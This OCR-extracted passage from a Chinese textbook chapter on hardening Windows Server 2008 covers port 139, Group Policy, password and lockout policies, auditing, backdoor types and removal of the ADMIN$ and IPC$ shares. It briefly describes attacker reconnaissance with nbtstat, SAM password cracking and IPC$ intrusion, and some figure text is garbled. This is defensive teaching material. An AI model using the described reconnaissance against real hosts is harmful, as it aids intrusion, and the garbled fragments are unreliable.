这 里 重点 介绍 139 端口 。139 端口 也 就 是 NetBIOS session 端口 ,用 作文 件 和 打印 的 共 
享 ,关闭 139 端口 的 方法 是 在 “本 地 连接 ”中 选取 *Internet 协议 (TCP/IP)” 属 性 ,进入 “高 级 
TCP/IP 设置 ,在 WINS 选项 卡 中 ,有 一 个 “禁用 TCP/IP 的 NETBIOS” 选 项 ,选中 后 即 可 
关闭 139 端口 。 

为 什么 要 关闭 139 端口 呢 ? 这 里 涉及 一 个 139 端口 入 侵 的 问题 。 如 果 黑 客 确定 一 台 存 
在 139 端口 漏洞 的 主机 ,用 扫描 工具 扫描 ,然后 使 用 “nbtstat -a IP” 命 令 得 到 用 户 的 情况 ,最 
后 完成 非法 访问 的 操作 。 


2.3.3 组 策略 


组 策略 是 管理 员 为 计算 机 和 用 户 定义 的 ,用 来 控制 应 用 程序 .系统 设置 和 管理 模板 的 一 

种 机 制 。 如 同一 个 庞大 的 数据 库 , 它 保存 着 Windows 系统 中 与 系统 .应 用 软件 配置 相关 的 

信息 。 随 着 Windows 功能 越 来 越 丰富 ,以 及 用 户 安装 在 计算 机 中 的 软件 程序 越 来 越 多 , 注 
册 表 中 的 相关 信息 也 越 来 越 多 。 

组 策略 是 修改 注册 表 中 的 配置 的 一 个 有 效 工 具 。 它 使 用 更 加 完善 的 管理 组 织 方法 ,对 

各 种 对 象 中 的 配置 进行 管理 和 设置 , 远 比 手动 修改 注册 表 更 加 方便 .灵活 ,功能 更 加 强大 。 

在 注册 表 中 ,很 多 信息 都 是 可 以 由 用 户 自 定义 设置 的 ,但 这 些 信息 发 布 在 注册 表 的 各 个 角 
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落 ,如 果 是 手动 配置 ,会 非常 困难 和 繁杂 。 而 组 策略 将 系统 重要 的 配置 功能 汇集 成 各 种 配置 
模块 , 供 管理 人 员 直 接 使 用 ,从 而 达到 方便 管理 计算 机 的 目的 。 

组 策略 是 介 于 控制 面板 和 注册 表 之 间 的 一 种 修改 系统 与 设置 程序 的 工具 ,利用 它 可 以 
修改 Windows 的 桌面 .开始 菜单 、 登 录 方式 .组件 、 网 络 及 IE 浏览 器 等 许多 设置 。 通 常情 况 
下 , 像 一 些 常用 的 系统 、 外 观 及 网 络 设置 等 ,用 户 可 以 在 控制 面板 中 修改 ,但 用 户 对 此 并 不 满 
意 ,因为 通过 控制 面板 能 修改 的 设置 太 少 ;水 平 高 一 点 的 用 户 可 以 用 修改 注册 表 的 方法 来 设 
置 ,但 是 注册 表 中 涉及 的 内 容 太 多 ,修改 起 来 并 不 方便 。 组 策略 正好 介 于 两 者 之 间 , 涉 及 的 
内 容 比 控制 面板 多 ,安全 性 和 控制 面板 一 样 高 ,而 条 理性 、 可 操作 性 比 注册 表 强 ,因此 成 为 网 
络 管理 员 管理 系统 的 首选 。 

组 策略 包括 影响 计算 机 的 “计算 机 配置 ?策略 设置 和 影响 用 户 的 “用 户 配置 ?策略 设置 ， 
如 图 2-1 所 示 ,“ 计 算 机 配置 "是 对 整个 计算 机 中 的 系统 配置 进行 设置 的 ,是 对 计算 机 中 所 有 
用 户 的 运行 环境 起 作用 ;* 用 户 配 置 " 则 是 对 当前 用 户 的 系统 配置 进行 设置 的 , 它 仅 对 当前 用 
户 起 作用 。 
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2-1 “本 地 组 策略 编辑 器 ”对 话 框 


2.3.4 账户 与 密码 安全 


账户 与 密码 的 使 用 通常 是 许多 系统 预 设 的 防护 措施 。 事 实 上 ,有 许多 用 户 的 密码 是 很 
容易 被 猜 中 的 ,或 者 使 用 系统 预 设 的 密码 ,甚至 不 设 密码 。 用 户 应 该 要 避免 使 用 不 当 的 密 
码 ,系统 预 设 密码 或 是 使 用 空白 密码 ,也 可 以 配置 本 地 安全 策略 要 求 密码 符合 安全 性 要 求 。 


2.3.5 漏洞 与 后 门 
1. 漏洞 


漏洞 即 某 个 程序 (包括 操作 系统 ) 在 设计 时 未 考虑 周全 , 当 程序 遇 到 一 个 看 似 合理 ,但 实 
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际 无 法 处 理 的 问题 时 ,引发 的 不 可 预见 的 错误 。 系 统 漏洞 又 称 安全 缺陷 ,对 用 户 造成 的 不 良 
后 果 有 : 中 如 漏洞 被 恶意 用 户 利用 ,会 造成 信息 泄露 。 例 如 ,黑客 攻击 网 站 即 利用 网 络 服务 
器 操作 系统 的 漏洞 。 包 对 用 户 操作 造成 不 便 。 例 如 ,不 明 原因 的 死机 和 丢失 文件 等 。 

可 见 , 只 有 堵 住 系统 漏洞 ,用 户 才 会 有 一 个 安全 和 稳定 的 工作 环境 。 

漏洞 的 产生 大 致 有 以 下 3 个 原因 。 

(1) 编程 人 员 的 人 为 因素 。 在 程序 编写 过 程 中 ,为 实现 不 可 告 人 的 目的 ,在 程序 代码 的 
隐藏 处 留 有 后 门 。 

(2) 受 编程 人 员 的 能 力 ` 经 验 和 当时 安全 技术 所 限 , 在 程序 中 难免 会 有 不 足 之 处 , 轻 则 
影响 程序 的 效率 , 重 则 导致 非 授权 用 户 的 权限 提升 。 

(3) 由 于 硬件 原因 ,使 编程 人 员 无 法 弥补 硬件 的 漏洞 ,从 而 使 硬件 的 问题 通过 软件 表现 


可 以 说 ,几乎 所 有 的 操作 系统 都 不 是 十 全 十 美的 ,总 是 存在 各 种 安全 漏洞 。 例 如 在 
Windows NT 中 ,安全 账户 管理 (SAMD) 数 据 库 可 以 被 以 下 用 户 所 复制 : Administrator 账 
户 .Administrators 组 中 的 所 有 成 员 、 备 份 操作 员 、 服 务 器 操作 员 以 及 所 有 具有 备份 特权 的 
人 员 。SAM 数据 库 的 一 个 备份 能 够 被 某 些 工具 所 利用 来 破解 口令 。 又 如 ,Windows NT 对 
较 大 的 ICMP 数据 包 是 很 脆弱 的 ,如 果 发 一 条 ping 命令 ,指定 数据 包 的 大 小 为 64KB， 
Windows NT 的 TCP/IP 栈 将 不 会 正常 工作 ,可 使 系统 离线 乃至 重新 启动 ,结果 造成 菜 些 服 
务 的 拒绝 访问 。 

任何 软件 都 难免 存在 漏洞 ,但 作为 系统 最 核心 的 软件 ,操作 系统 存在 的 漏洞 会 使 黑客 有 
机 可 乘 。 例 如 ,64 位 Windows 7 图 形 显示 组 件 中 的 一 个 漏洞 有 可 能 导致 系统 崩溃 ,或 者 被 
黑客 利用 并 执行 远程 代码 ,用 户 可 以 通过 关闭 Windows Aero 的 方式 或 打上 安全 补丁 来 防 
止 这 一 漏洞 被 他 人 利用 。 

实际 上 ,根据 目前 的 软件 设计 水 平和 开发 工具 ,要 想 绝对 避免 软件 漏洞 几乎 是 不 可 能 
的 。 操 作 系 统 作为 一 种 系统 软件 ,在 设计 和 开发 过 程 中 造成 这 样 或 那样 的 缺陷 , 埋 下 一 些 安 
全 隐患 ,使 黑客 有 机 可 乘 , 也 可 以 理解 。 可 以 说 ,软件 质量 决定 了 软件 的 安全 性 。 

2. 后 门 

后 门 (back door) 是 绕 过 安全 性 控制 而 获取 对 程序 或 系统 访问 权 的 方法 。 在 软件 的 开 
发 阶段 ,程序 员 常 会 在 软件 内 创建 后 门 以 便 可 以 修改 程序 中 的 缺陷 。 如 果 后 门 被 其 他 人 知 
道 ,或 是 在 发 布 软件 之 前 没有 删除 后 门 ,那么 它 就 成 了 安全 风险 。 

后 门 产生 的 必要 条 件 如 下 。 

(1) 必须 以 某 种 方式 与 其 他 终端 节点 相连 。 因 为 都 是 从 其 他 节点 访问 后 门 ,因此 必须 
使 用 双 绞 线 、 光 纤 . 串 /并 口 蓝牙 、 红 外 等 设备 与 目标 主机 连接 才 可 以 对 端口 进行 访问 。 只 
有 访问 成 功 , 双 方才 可 以 进行 信息 交流 ,攻击 方才 有 机 会 进行 人 侵 。 

(2) 目标 主机 默认 开放 的 可 供 外 界 访问 的 端口 必须 在 一 个 以 上 。 因 为 一 台 默 认 无 任何 
端口 开放 的 机 器 是 无 法 进行 通信 的 ,而 如 果 开 放 的 端口 无 法 被 外 界 访问 , 则 目标 主机 同样 不 
可 能 遭 到 入 侵 。 

(3) 目标 主机 存在 程序 设计 或 人 为 政 忽 , 导 致 攻击 者 能 以 权限 较 高 的 身份 执行 程序 。 
并 不 是 任何 一 个 权限 的 账号 都 能 够 被 利用 的 .只 有 权限 达到 操作 系统 一 定 要 求 后 , 才 人 允许 执 
行 修改 注册 表 修改 日 志 记录 等 操作 。 
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后 门 的 分 类 方法 有 多 种 ,为 了 便于 大 家 理解 ,下 面 从 技术 方面 来 考虑 后 门 的 分 类 方法 。 

(1) 网 页 后 门 。 这 类 后 门 一 般 都 是 利用 服务 器 上 正常 的 Web 服务 来 构造 自己 的 连接 
方式 ,比如 现在 非常 流行 的 ASP、CGI 脚本 后 门 等 。 

(2) 线程 插入 后 门 。 利 用 系统 自身 的 某 个 服务 或 者 线程 ,将 后 门 程序 插入 其 中 ,这 也 是 
现在 最 流行 的 一 个 后 门 技术 。 

(3) 扩展 后 门 。 所 谓 的 “扩展 ”, 是 指 在 功能 上 有 大 的 提升 , 比 普通 的 单一 功能 的 后 门 有 
更 强 的 使 用 性 ,这 种 后 门 本 身 就 相当 于 一 个 小 的 安全 工具 包 . 能 实现 非常 多 的 常见 安全 
功能 。 

(4) C/S 后 门 。 采 用 “客户 端 /服务 器 ”的 控制 方式 ,通过 某 种 特定 的 访问 方式 来 启动 后 
门 , 从 而 达到 控制 服务 器 的 目的 。 

(5) root kit。root kit 出 现 于 20 世纪 90 年 代 初 ,在 1994 年 2 月 的 一 篇 安全 咨询 报告 
中 首先 使 用 了 root kit 这 个 名 词 。root kit 是 攻击 者 用 来 隐藏 自己 的 踪迹 和 保留 root 访问 
权限 的 工具 。 通 常 , 攻 击 者 通过 远程 攻击 获得 root 访问 权限 ,进入 系统 后 ,攻击 者 会 在 侵入 
的 主机 中 安装 root kit, 然 后 将 经 常 通过 root kit 的 后 门 检查 是 否 有 其 他 的 用 户 登 录 系统 ， 
如 果 只 有 自己 ,攻击 者 就 开始 清理 日 志 中 的 有 关 信息 。 通 过 root kit 的 嗅 探 器 获得 其 他 系 
统 的 用 户 和 密码 之 后 ,攻击 者 就 会 利用 这 些 信 息 侵 入 其 他 系统 。 

3. 漏洞 与 后 门 的 区 别 

后 门 是 留 在 计算 机 系统 中 ,通过 某 种 特殊 方式 控制 计算 机 系统 以 供 某 类 特殊 使 用 的 途 
径 。 它 不 仅 绕 过 系统 已 有 的 安全 设置 ,而 且 还 能 挫败 系统 上 的 各 种 增强 的 安全 设置 。 

漏洞 是 在 硬件 、 软 件 .协议 的 具体 实现 或 系统 安全 策略 上 存在 的 缺陷 ,攻击 者 能 够 利用 
这 些 漏 洞 在 未 授权 的 情况 下 访问 或 破坏 系统 。 

漏洞 虽然 可 能 最 初 就 存在 于 系统 当中 ,但 漏洞 并 不 是 自己 出 现 的 ,必须 要 有 人 来 发 现 。 
在 实际 使 用 中 ,用 户 会 发 现 系统 中 存在 的 错误 ,而 人 侵 者 会 有 意 利 用 其 中 的 某 些 错误 来 威胁 
系统 安全 ,这 时 人 们 会 认识 到 这 个 错误 是 一 个 漏洞 。 然 后 系统 供应 商会 尽快 发 布 针对 这 个 
漏洞 的 补丁 程序 。 

漏洞 和 后 门 是 不 同 的 ,漏洞 是 一 种 无 意 的 行为 ,是 不 可 避免 的 ,是 难以 预知 的 ,无 论 是 硬 
件 还 是 软件 都 存在 着 漏洞 ;而 后 门 是 一 种 有 意 的 行为 ,是 人 为 故意 设置 的 ,是 完全 可 以 避 
免 的 。 


24 项 目 实 施 


2.4.1 任务 1: 账户 安全 配置 


1. 任务 目标 

(1) 了 解 操作 系统 账户 安全 的 重要 性 。 

(2) 掌握 账户 安全 配置 的 方法 。 

2. 任务 内 容 

(1) 更 改 Administrator 账户 名 称 。 
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(2) 创建 一 个 陷阱 账户 。 

(3) 不 让 系统 显示 上 次 登录 的 账户 名 。 

3. 完成 任务 所 需 的 设备 和 软件 

安装 有 Windows Server 2008 操作 系统 的 计算 机 1 台 。 

4. 任务 实施 步骤 

1) 更 改 Administrator 账户 名 称 

由 于 Administrator 账户 是 微软 操作 系统 的 默认 系统 管理 员 账 户 , 且 此 账户 不 能 被 停 
用 ,这 意味 着 非法 入侵 者 可 以 一 遍 又 一 遍地 猜测 这 个 账户 的 密码 。 将 Administrator 重 命名 
为 其 他 名 称 , 可 以 有 效 地 解决 这 一 问题 。 下 面 介绍 Windows Server 2008 中 重 命名 
Administrator 账户 名 称 的 方法 。 

步骤 1: 选择 “开始 ”>“ 所 有 程序 ”>“ 管 理工 具 ”>“ 本 地 安全 策略 "命令 ,打开 “本 地 安 
全 策略 ”窗口 ,如 图 2-2 所 示 。 


文件 FP) 操作 以) 查看 W) 帮助 00 
有 本 | 可 | 吕 |XIGIEGIB 


贺 用 户 账户 控制 : 只 提升 签名 并 验证 的 可 执行 文件 已 禁用 
国 域 成 员 ; 对 安全 通道 数据 进行 数字 加 密 和 0 果 . . ， 已 启用 
贺 域 成 员 : 对 安全 通道 数据 进行 数字 加 密 或 数 .已 启用 
圆 域 成 员 : 对 安全 通道 歼 据 进行 数字 签名 各 果 . . ， 已 启用 
图 域 成 员 
圆 域 成 员 














计算 机 账户 密码 最 长 使 用 期 限 
禁用 计算 机 账户 密码 更 必 
国 域 成 员 ; 需要 强 Windows 2000 或 更 高 版 本 ) 
贺 域 控制 器 ， LDAP 服务 器 签名 要 求 
国 域 控制 器 : 拒绝 计算 机 账户 密码 更 改 


国 域 控 制 器 允许 服务 器 操作 者 计划 任务 





图 2-2 “本 地 安全 策略 ”窗口 


步骤 2: 在 左 侧 窗 格 中 ,选择 “安全 设置 ”>“ 本 地 策略 ”>“ 安 全 选项 ”选项 ,在 右 侧 窗 格 
中 ,双击 “账户 : 重 命名 系统 管理 员 账 户 " 策 略 选项 ,打开 如 图 2-3 所 示 的 对 话 框 ,将 系统 管 
理 员 账 户 名 称 Administrator 改 为 一 个 普通 的 账户 名 称 , 如 huang, 而 不 要 使 用 诸如 Admin 
之 类 的 账户 名 称 , 单 击 “ 确 定 ” 按 钮 。 

步骤 3: 更 改 完成 后 ,选择 “开始 ”>“ 所 有 程序 ”>“ 管 理工 具 ”>“ 计 算 机 管理 ”命令 , 打 
开 “ 计 算 机 管理 "窗口 ,在 左 侧 窗 格 中 ,选择 “系统 工具 ”>“ 本 地 用 户 和 组 ”>“ 用 户 ” 选 项 ,如 
图 2-4 所 示 , 默 认 的 Administrator 账户 名 称 已 被 更 改 为 huang。 

步骤 4: 在 图 2-4 中 ,选择 左 侧 窗 格 中 的 “组 ”选项 ,然后 双击 右 侧 窗 格 中 的 
“Administrators” 组 名 ,打开 “Administrators 属性 ”对 话 框 ,默认 只 有 Administrator 账户 ， 
如 图 2-5 所 示 。 选 中 Administrator 账户 , 单 击 “删除 ”按钮 ,将 该 账户 删除 。 

步骤 5: 在 图 2-5 中 , 单 击 “ 添 加 ”按钮 ,打开 “选择 用 户 ” 对 话 框 , 单 击 “ 高 级 ”按钮 ,再 单 
击 “ 立 即 查 找 ” 按 钮 ,双击 对 话 框 底 部 的 huang 选项 ,如 图 2-6 所 示 。 此 时 ,在 “输入 对 象 名 称 
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图 2-5 





“Administrators 属性 "对话 框 


项 目 2 Windows Server 2008 系统 安全 加 固 
来 选择 ”文本 框 中 自动 出 现 了 已 经 重 命 名 的 管理 员 账 户 名 称 , 如 WINSERVER\huang( 计 算 
机 名 \ 账 户 名 ) ,如 图 2-7 所 示 。 











图 2-7 “选择 用 户 ” 对 话 框 (2) 


步骤 6: 单 击 “ 确 定 ” 按 钮 返回 "Administrators 属性 ”对 话 框 ,再 单 击 “ 确 定 ” 按 钮 完成 系 
统管 理 员 名 称 的 更 改 。 

2) 创建 一 个 陷阱 账户 

陷阱 账户 就 是 让 非法 入 侵 者 误 认为 是 管理 员 账 户 的 非 管理 员 账户 。 默 认 的 管理 员 账 户 
Administrator 重 命名 后 ,可 以 创建 一 个 同名 的 拥有 最 低 权 限 的 Administrator 账户 ,并 把 它 
添加 到 Guests 组 (Guests 组 的 权限 为 最 低 ) 中 ,再 为 该 账户 设置 一 个 超过 20 位 的 超级 复杂 
密码 (其 中 包括 字母 数字 ,特殊 符号 等 字符 )。 这 样 可 以 使 非法 入 侵 者 要 花费 很 长 的 时 间 才 
能 破解 密码 , 借 此 发 现 他们 的 人 侵 企图 。 

步骤 1: 选择 “开始 ”>“ 所 有 程序 ”>“ 管 理工 具 ”>“ 计 算 机 管理 ”命令 ,打开 “计算 机 管 
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理 ” 窗 口 ,在 左 侧 窗 格 中 ,选择 “系统 工具 ”>“ 本 地 用 户 和 组 ”>“ 用 户 ” 选 项 ,然后 右 击 “ 用 
户 ” 选 项 ,在 弹出 的 快捷 菜单 中 选择 “新 用 户 ” 命 令 , 打 开 “ 新 用 户 ” 对 话 框 ,如 图 2-8 所 示 。 





[lelaalgls 
i 











图 2-8 “新 用 户 ” 对 话 框 


步骤 2: 在 “用 户 名 ”文本 框 中 输入 用 户 名 Administrator, 在 “密码 ”和 “确认 密码 ”文件 
框 中 输入 一 个 较 复杂 的 密码 (其 中 包括 字母 ,数字 、 特 殊 符号 等 字符 ), 单 击 “ 创 建 " 按 钮 ,再 单 
击 “ 关 闭 ” 按 钮 。 

步骤 3: 右 击 新 创建 的 用 户 名 Administrator, 在 弹出 的 快捷 菜单 中 选择 “属性 ”命令 , 打 
开 “Administrator 属性 ”对 话 框 ,选择 “隶属 于 ”选项 卡 ,如 图 2-9 所 示 , 从 图 中 可 见 ， 
Administrator 用 户 默 认 隶 属于 Users 组 。 








图 2-9 “Administrator 属性 ”对 话 框 (1) 
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步骤 4: 单 击 “ 添 加 ”按钮 ,打开 “选择 组 ”对 话 框 ,如 图 2-10 所 示 。 








图 2-10 “选择 组 ”对 话 框 (1) 


步骤 5: 单 击 “高 级 ”按钮 ,再 单 击 “ 立 即 查 找 ” 按 钮 ,双击 对 话 框 底部 的 Guests 组 名 ,如 
图 2-11 所 示 。 














图 2-11 “选择 组 ”对 话 框 (2) 


步骤 6: 单 击 * 确 定 ” 按 钮 ,返回 “Administrator 属性 ”对 话 框 ,此 时 已 添加 了 Guests 组 ， 
如 图 2-12 所 示 。 

步骤 7: 在 图 2-12 中 ,选中 Users 组 名 , 单 击 “ 删 除 ” 按 钮 ,再 单 击 “ 确 定 ” 按 钮 。 此 时 ， 
Administrator 账户 已 设置 为 陷阱 账户 。 

3) 不 让 系统 显示 上 次 登录 的 账户 名 

默认 情况 下 ,登录 对 话 框 中 会 显示 上 次 登录 的 账户 名 。 这 使 得 非法 入 侵 者 可 以 很 容易 
地 得 到 系统 的 一 些 账户 名 ,进而 做 密码 猜测 ,从 而 给 系统 带 来 一 定 的 安全 隐患 。 可 以 设置 登 
录 时 不 显示 上 次 登录 的 账户 名 ,来 解决 这 一 问题 。 
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图 2-12 “Administrator 属性 ”对 话 框 (2) 


步骤 1: 在 “本 地 安全 策略 ”窗口 的 左 侧 窗 格 中 ,选择 “本 地 策略 ”>“ 安 全 选项 ”选项 。 

步骤 2: 在 右 侧 窗 格 中 ,找到 并 双击 “交互 式 登录 : 不 显示 最 后 的 用 户 名 ”选项 (如 图 2-13 
所 示 ) ,打开 “交互 式 登录 : 不 显示 最 后 的 用 户 名 属性 ”对话 框 ,在 “本 地 安全 设置 "选项 卡 
中 ,选中 “已 启用 ” 单 选 按钮 ,如 图 2-14 所 示 , 单 击 “ 确 定 ” 按 钮 。 
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图 2-13 “本 地 安全 策略 "窗口 
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交互 式 登录 : 不 显示 最 后 的 用 户 名 属性 





图 2-14 “交互 式 登录 : 不 显示 最 后 的 用 户 名 属性 ?对 话 框 


2.4.2 任务 2: 密码 安全 配置 


1. 任务 目标 

(1) 了 解 操 作 系统 密码 安全 的 重要 性 。 

(2) 掌握 密码 安全 配置 的 方法 。 

2. 任务 内 容 

(1) 设置 用 户 账户 策略 。 

(2) 设置 用 户 账户 锁定 策略 。 

3. 完成 任务 所 需 的 设备 和 软件 

安装 有 Windows Server 2008 操作 系统 的 计算 机 1 台 。 

4. 任务 实施 步骤 

设置 一 个 安全 的 密码 ,对 系统 来 说 非常 重要 ,这 也 是 用 户 经 常 忽略 的 。 
1) 设置 用 户 账户 策略 

步骤 1: 选择 “开始 ”>“ 所 有 程序 ”>“ 管 理工 具 ”>“ 本 地 安全 策略 "命令 ,打开 “本 地 安 


全 策略 ”窗口 ,在 左 侧 窗 格 中 ,选择 “安全 设置 >“ 账户 策略 ”一 “密码 策略 "选项 ,如 图 2-15 
所 示 。 


步骤 2: 双击 右 侧 窗 格 中 的 “密码 长 度 最 小 值 ” 策 略 选项 ,打开 “密码 长 度 最 小 值 属性 ” 


对 话 框 ,选择 “本 地 安全 设置 "选项 卡 ,设置 密码 必须 至 少 是 6 个 字符 ,如 图 2-16 所 示 , 单 击 
“确定 ”按钮 ,返回 “本 地 安全 策略 ”窗口 。 


步骤 3: 在 图 2-15 中 ,双击 右 侧 窗 格 中 的 “密码 最 短 使 用 期 限 " 策 略 选 项 ,打开 “密码 最 


短 使 用 期 限 属性 ”对 话 框 ,设置 “在 以 下 天 数 后 可 以 更 改 密码 ”为 3 天 ,如 图 2-17 所 示 , 单 击 
“确定 "按钮 ,返回 “本 地 安全 策略 窗口。 
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臣 本 地 安全 策略 
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田 田 田 田 田 ” 田 田 
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密码 长 度 最 小 值 属性 








图 2-16 “密码 长 度 最 小 值 属性 ?对 话 框 图 2-17 “密码 最 短 使 用 期 限 属性 "对 话 框 


步骤 4: 同 理 , 设 置 “密码 最 长 使 用 期 限 ” 为 14 天 ,设置 “强制 密码 历史 ”为 10 个 记 住 的 
密码 ,设置 “密码 必须 符合 复杂 性 要 求 " 为 “已 启用 ”。 上 述 设置 完成 后 的 密码 策略 如 图 2-18 
所 示 。 

2) 设置 用 户 账户 锁定 策略 

用 户 账户 锁定 策略 可 以 防止 非法 入 侵 者 不 断 地 猜测 用 户 的 账户 密码 。 

步骤 1: 在 图 2-18 中 ,选择 左 侧 窗 格 中 的 “账户 锁定 策略 ”选项 ,在 右 侧 窗 格 中 显示 了 账 
户 锁 定 策略 的 三 个 策略 项 ,如 图 2-19 所 示 。 
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匾 本 地 安全 策略 





2-19 “本 地 安全 策略 "窗口 


步骤 2: 双击 右 侧 窗 格 中 的 “账户 锁定 阔 值 ?策略 选项 ,打开 * 账 户 锁定 阔 值 属性 ?对 话 
框 , 在 “本 地 安全 设置 选项 卡 中 ,设置 “在 发 生 以 下 情况 之 后 ,锁定 账户 ?为 3 次 无 效 登 录 , 如 
图 2-20 所 示 。 

步骤 3: 单 击 * 确 定 "按钮 ,弹出 建议 的 数值 改动 ”对话 框 ,设置 建议 的 “账户 锁定 时 间 ” 
为 “30 分 钟 ”“ 重 置 账户 锁定 计数 器 "为 “30 分 钟 之 后 ”, 如 图 2-21 所 示 , 单 击 “ 确 定 ” 按 钮 , 完 
成 账户 锁定 策略 的 设置 。 
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ERRTTTT3 





建议 的 数值 改动 








图 2-20 “账户 锁定 阔 值 属性 ”对 话 框 图 2-21 “建议 的 数值 改动 ”对话 框 


2.4.3 任务 3: 系统 安全 配置 


1. 任务 目标 

(1) 了 解 操作 系统 的 系统 安全 的 重要 性 。 

(2) 掌握 系统 安全 配置 的 方法 。 

2. 任务 内 容 

(1) 自动 更 新 Windows 补丁 程序 。 

(2) 开启 审核 策略 。 

(3) 关闭 默认 共享 资源 。 

(4) 关闭 自动 播放 功能 。 

3. 完成 任务 所 需 的 设备 和 软件 

安装 有 Windows Server 2008 操作 系统 的 计算 机 1 台 。 

4. 任务 实施 步骤 

1) 自动 更 新 Windows 补丁 程序 

几乎 所 有 的 操作 系统 都 不 是 十 全 十 美的 ,总 是 存在 各 种 安全 漏洞 ,这 使 非法 入 侵 者 有 机 
可 乘 。 因 此 ,及 时 给 Windows 系统 打上 补丁 程序 ,是 加 强 Windows 系统 安全 的 简单 ,高效 
的 方法 。 

步骤 1: 选择 “开始 ”>“ 所 有 程序 ”>“Windows Update” 命 令 , 打 开 “Windows Update” 
窗口 ,如 图 2-22 所 示 。 

步骤 2: 单 击 左 侧 窗 格 中 的 “更 改 设置 "链接 ,打开 “更 改 设置 ”窗口 ,在 “重要 更 新 ”下 拉 
列表 框 中 选择 “自动 安装 更 新 (推荐 )” 选 项 ,如 图 2-23 所 示 , 系 统 默认 在 每 天 凌晨 3 时 自动 
下 载 推荐 的 更 新 ,并 安装 它们 。 
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2-22 “Windows Update” 窗 口 
[二 本 本 二 ind Wile EGR 

选择 Windows 安装 更 新 的 方法 

有 新 时 ， 信也 本 

自动 更 新 如 何 帮助 我 ? 

更 下 (于 推 和 -一 
厂 以 接收 重要 更 新 的 相同 方式 为 我 提供 推荐 的 更 新 ) 
谁 可 以 安装 更 新 
允许 所 有 用 户 在 此 计算 机 上 安装 更 新 on) 
注意 ，Windovs Update 在 检查 其 他 更 新 之 前 ， 可 能 全 首先 自动 进行 自我 更 新 。 请 癌 疾 及 和 站 明 。 
El | 
图 2-23 “更 改 设置 ”窗口 
2) 开启 审核 策略 


安全 审核 是 Windows Server 2008 最 基本 的 入 侵 检测 方法 。 当 有 非法 入 侵 者 对 系统 进 
行 某 种 方式 入 侵 时 ,都 会 被 安全 审核 记录 下 来 。 
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步骤 1: 在 “本 地 安全 策略 "窗口 中 ,选择 “本 地 策略 ”~ 审核 策略 ?选项 ,在 右 侧 窗 格 中 
列 出 了 审核 策略 列表 ,这 些 审核 策略 在 默认 情况 下 都 是 无 审核 的 ,如 图 2-24 所 示 。 





i 
半 


本 








图 2-24 “本 地 安全 策略 "窗口 
步骤 2: 双击 右 侧 窗 格 中 的 “审核 登录 事件 "策略 选项 ,打开 “审核 登录 事件 属性 ”对 话 


框 ,在 “本 地 安全 设置 "选项 卡 中 ,选中 “成 功 " 和 “失败 ” 复 选 框 ,如 图 2-25 所 示 , 单 击 * 确 定 ” 
按钮 。 





市 核 登 录 事件 属性 





图 2-25 “审核 登录 事件 属性 ”对 话 框 
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步骤 3: 同 理 ,可 以 根据 需要 设置 其 他 审核 策略 。 
说 明 以 下 是 各 种 审核 策略 的 含义 


G@ 审核 策略 更 改 : 审核 对 策略 的 改变 操作 。 
审核 登录 事件 : 审核 账户 的 登录 或 注销 操作 
审核 对 象 访问 : 审核 对 文件 或 文件 夹 等 对 象 的 操作 。 
审核 过 程 跟踪 : 审核 应 用 程序 的 启动 和 关闭 
审核 目录 服务 访问 : 审核 对 活动 目录 的 各 种 访问 。 


) 审核 特权 使 用 : 审核 用 户 执 行 用 户 权 限 的 操作 ,如 更 改 系 统 时 间 等 。 

市 核 系统 事件 : 审核 与 系统 相关 的 事件 ,如 重新 启动 或 关闭 计算 机 等 。 

3) 审核 账户 登录 事件 : 审核 账户 的 登录 或 注销 另 一 台 计 算 机 (用 于 验证 账户 ) 的 操作 。 
审核 账户 管理 : 审核 与 账户 管理 有 关 的 操作 。 










ew 为 J 便 于 远程 管理 ,系统 会 创建 一 些 隐蔽 的 特殊 共享 资源 ,如 
ADMIN $ .C$ .IPC$ 和 源 在 “计算 机 ?中 是 不 可 见 的 。 一 般 情况 下 ,用户 不 会 
去 使 用 这 些 特殊 的 共享 资 人 但 是 非法 入 侵 者 却 会 利用 它 来 对 系统 进行 攻击 ,以 获取 系统 的 
控制 权 , 最 典型 的 就 是 IPC$ 入 侵 。 因 此 ,系统 管理 员 在 确认 不 会 使 用 这 些 特殊 共享 资源 的 
情况 下 ,应 删除 这 和 并且 共享 资源 

步骤 1: 在 “命令 提示 符 ” 窗 口中 ,输入 net share 命令 ,查看 共享 资源 ,如 图 2-26 所 示 。 


Windows 系统 











图 2-26 使 用 net share 命令 查看 特殊 共享 资源 


步骤 2: 输入 net share ADMIN $ /delete 命令 ,删除 ADMIN $ 共享 资源 ,再 输入 net 
share 命令 ,验证 是 否 已 删除 ADMIN $ 共享 资源 ,如 图 2-27 所 示 。 
同 理 ,可 删除 C$ 、D$ 等 共享 资源 。 
本 要 3。 IPC$ 共享 资源 不 能 被 net share 命令 删除 , 须 利 用 注册 表 编 辑 器 来 对 它 进行 限 
制 使 用 。 选 择 “ 开 始 ”>“ 运 行 ”命令 ,打开 “运行 "对话 框 ,在 对 话 框 的 “打开 ”文本 框 中 输入 
regedit 命令 ,然后 单 击 “ 确 定 ” 按 钮 ,打开 注册 表 编 辑 器 。 
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图 2-27 删除 特殊 共享 资源 


步骤 4: 找到 组 键 HKEY_LOCAL_MACHINE\ 
中 的 restrictanonymous 子 键 ,将 其 值 改 为 1, 如 图 2-28 所 示 
它 。 此 时 一 个 匿名 用 户 仍 然 可 以 空 连接 到 IPC$ 共 
号 和 共享 信息 的 权限 ( 枚 举 攻 击 ) 





如 果 没 有 这 个 子 键 , 则 新 建 
E 接 列举 SAM 账 
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图 2-28 使 用 注册 表 编 辑 器 禁用 IPC$ 


说 明 
C$ 、D$ 等 ; 允许 管理 人 员 连 接 到 驱动 器 根 目录 下 的 共享 资源 。 
@@ ADMIN$ : 计算 机 远程 管理 期 间 使 用 的 资源 。 该 资源 的 路 径 总 是 系统 根 目录 路 径 
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(安装 操作 系统 的 目录 ,如 C:\Windows)。 

@ IPC$ : 共享 命名 管理 的 资源 ,在 程序 之 间 的 通信 过 程 中 ,该 命名 管道 起 着 至 关 重 要 
的 作用 。 在 计算 机 的 远程 管理 期 间 , 以 及 在 查看 计算 机 的 共享 资源 时 使 用 IPC$ 。 不 能 删 

四 系统 重新 启动 后 ,被 删除 的 特殊 共享 资源 将 会 重新 建立 。 因 此 ,为 保证 不 会 出 现 特 
殊 共 享 资源 攻击 ,应 使 用 批 处 理 的 方式 在 系统 重启 时 自动 进行 删除 操作 。 

@ 全 部 删除 系统 中 的 特殊 共享 资源 ,将 影响 系统 提供 的 文件 共享 服务 、 打 印 共享 服务 
